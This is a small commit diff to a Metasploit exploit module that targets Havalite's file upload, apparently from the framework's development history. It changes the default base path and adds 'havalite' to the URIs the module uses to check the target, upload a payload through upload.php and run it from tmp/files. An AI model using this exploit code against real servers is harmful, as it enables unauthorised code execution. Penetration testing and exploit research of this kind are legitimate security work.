Change base path

Author: wchen-r7

modules/exploits/unix/webapp/havalite_upload_exec.rb

@@ -49,7 +49,7 @@ def initialize(info={})
 
 			register_options(
 				[
-					OptString.new('TARGETURI', [true, 'The base path to havalite', '/havalite/'])
+					OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
 				], self.class)
 	end
 
@@ -65,7 +65,7 @@ def peer
 	# the vendor or OSVDB about exactly which ones are really vulnerable.
 	#
 	def check
-		uri = normalize_uri(target_uri.path)
+		uri = normalize_uri(target_uri.path, 'havalite/')
 		res = send_request_raw({'uri' => uri})
 
 		if not res
@@ -98,7 +98,7 @@ def upload(base)
 
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => normalize_uri(base, 'upload.php'),
+			'uri'    => normalize_uri(base, 'havalite', 'upload.php'),
 			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
 			'data'   => post_data
 		})
@@ -120,7 +120,7 @@ def upload(base)
 	#
 	def exec(base, payload_fname)
 		res = send_request_raw({
-			'uri' => normalize_uri(base, 'tmp', 'files', payload_fname)
+			'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)
 		})
 
 		if res and res.code == 404